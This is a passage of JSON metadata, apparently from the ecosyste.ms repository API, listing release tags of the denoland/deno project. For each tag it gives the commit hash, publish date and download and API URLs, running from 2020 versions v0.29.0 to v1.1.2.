osyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.